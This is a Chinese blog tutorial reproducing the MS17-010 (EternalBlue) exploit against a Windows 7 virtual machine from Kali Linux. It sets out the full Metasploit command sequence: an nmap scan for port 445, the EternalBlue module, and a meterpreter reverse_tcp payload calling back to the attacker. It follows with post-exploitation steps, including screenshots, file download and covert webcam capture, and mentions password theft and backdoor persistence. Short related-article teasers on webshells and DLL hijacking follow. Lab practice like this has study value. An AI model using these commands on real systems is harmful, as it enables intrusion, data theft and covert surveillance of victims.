ms17_010(永恒之蓝)漏洞复现详细教程

摘要:
测试环境kalinux 192.168.1.109(主机)windows7192.168.1.104(虚拟机)开始使用nmap命令扫描LAN中的所有主机(因为ms17_010漏洞的最基本要求是打开端口445)。这里,使用了nmap的最基本扫描。

如题,这是个漏洞复现的详细教程,本教程针对的系统是Windows7操作系统,其他系统请自行测试。

备注:教程会很详细,讲解会很明白,一文可以解决你的常见困难。

测试环境

kalilinux 192.168.1.109 (主机)
windows7 192.168.1.104 (虚拟机)

开始

首先使用 nmap 命令扫描局域网内的所有主机(因为ms17_010漏洞的最基本要求是需要开启445端口),这里使用nmap的最基本的扫描,直接命令后跟ip,nmap 192.168.1.1/24(扫描整个局域网的意思)。
首先开启Metasploit框架,这是一款集合各种漏洞和后期利用工具的框架,强大到不需要太多专业知识就可以快速上手的攻击框架,配合图形化界面Armitage可以实现图形化界面攻击。

msfconsole //启动命令

ms17_010(永恒之蓝)漏洞复现详细教程第1张

然后开启另一个窗口,看一下自己的ip,扫描自己的所在的ip段,可以看到我的ip是192.168.1.109。,那么我的ip段就是192.168.1.1/24(扫描1-255主机)。

ifconfig 查看自己电脑ip

ms17_010(永恒之蓝)漏洞复现详细教程第2张

使用nmap扫描局域网所有主机的开放端口

nmap 192.168.1.1/24 //扫描主机的端口开放情况

这里显示了目标电脑的ip和端口服务等信息,可以看到这个电脑的445端口是开放的,所以就直接进行攻击。

ms17_010(永恒之蓝)漏洞复现详细教程第3张

回到刚才的窗口,搜索ms17_010漏洞,可以看到返回了四条数据,我们这里使用的是第三条进行攻击,可以先使用第二条测试下目标电脑是否包含该漏洞,若是有的话进行攻击,没有的话可以考虑别的目标。

search ms17_010

ms17_010(永恒之蓝)漏洞复现详细教程第4张

使用永恒之蓝漏洞,使用use 名称 命令进行命令使用。

use exploit/windows/smb/ms17_010_eternalblue //使用永恒之蓝漏洞

ms17_010(永恒之蓝)漏洞复现详细教程第5张

然后显示所需要的参数.

show options

ms17_010(永恒之蓝)漏洞复现详细教程第6张

我们需要设置一个远程主机ip和一个自己电脑ip,外加一个攻击载体,就可以进行攻击了(依次执行下边命令)。

set rhost 192.168.1.104 //设置目标主机

set payload windows/x64/meterpreter/reverse_tcp //设置攻击载体(简单来说就是,如果不使用这个模块,攻击成功之后,就是一个简单的shell,使用这个载体,攻击成功之后可以使用这个模块自带的各种攻击模块(强大到想流泪的功能模块))。

set lhost 192.168.1.109 //设置本机ip地址(用来攻击成功之后,监听被开放的目标电脑的端口)

run //执行攻击

设置完成之后可以查看下设置的参数,以确保参数正确(这个步骤可以省略)。

show options

ms17_010(永恒之蓝)漏洞复现详细教程第7张

run //执行漏洞

利用成功,成功之后会出现下面的情况,在这里可以进行文件上传下载,获取截屏,获取密码,使用摄像头拍照,后门持久化等操作。

ms17_010(永恒之蓝)漏洞复现详细教程第8张

截屏操作,截取的图片可以去制定的目录里面查看ms17_010(永恒之蓝)漏洞复现详细教程第9张

screenshot

获取截屏。

ms17_010(永恒之蓝)漏洞复现详细教程第10张

下载文件

download AHK.ahk

ms17_010(永恒之蓝)漏洞复现详细教程第11张

使用摄像头拍照

webcam_snap //使用摄像头拍一张照片

webcam_stream //在网页开启摄像头

免责声明:文章转载自《ms17_010(永恒之蓝)漏洞复现详细教程》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇FFMPEG学习----遍历所支持的解码器windows xp/7/8/8.1/10安全模式详解和系统修复讲解下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

文件上传漏洞(File Upload)

简介 File Upload,即文件上传漏洞,通常是由于对用户上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马,病毒,恶意脚本等获取服务器的webshell权限,并进而攻击控制服务器,因此文件上传漏洞带来的危害常常是毁灭性的。简单点说,就是用户直接或者通过各种绕过方式将webshell上传到服务器中进而执行利用。例如,如果你的服务器...

飞利浦医学成像系统披露多个安全漏洞,黑客可远程控制!

近日,飞利浦临床协作平台门户(又名 Vue PACS)中披露了多个安全漏洞,其中一些漏洞可能被攻击者利用来控制受影响的系统。 知名网络安全专家、东方联盟创始人郭盛华透露:“黑客成功利用这些漏洞可能允许未经授权的人或进程窃听、查看或修改数据、获得系统访问权限、执行代码、安装未经授权的软件或影响系统数据完整性,从而对机密性、完整性产生负面影响或系统的可用性。“...

看我如何用微信上线CobaltStrike

前言   DLL劫持漏洞是老生常谈的一个漏洞,已经被前辈们各种奇技淫巧玩烂。但DLL劫持技术在后渗透和域渗透中的权限提升和权限维持都起到了至关重要的作用。本文简单剖析DLL劫持技术并通过实例应用来查看如何在渗透工作中利用此项技术。篇幅稍长,各位读者耐心观看,文中有不妥之处请各位加以斧正。 DLL劫持原理 什么是DLL?   DLL是动态链接库文件,在Win...

PHP文件包含漏洞(利用phpinfo)复现

0x01 简介 PHP文件包含漏洞中,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来getshell。因为临时文件名是随机的,如果目标网站上存在phpinfo,则可以通过phpinfo来获取临时文件名,进而进行包含。 0x02 漏洞利用原理 在给PHP发送POST数据包时,如果数据包里包含文件区块,无论你访问的代码中有没有处理文件上传的逻辑,PH...

linux 路由表设置 之 route 指令详解

转载于:http://blog.csdn.net/chenlycly/article/details/52141854 使用下面的 route 命令可以查看 Linux 内核路由表。 [cpp]view plaincopy # route   Destination     Gateway         Genmask Flags Metric ...

【原创】hadoop启动错误 找不到路由 解决方法

hadoop启动过程中遇到下面的问题:2012-07-04 18:43:20,763 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: STARTUP_MSG: /************************************************************ STARTUP...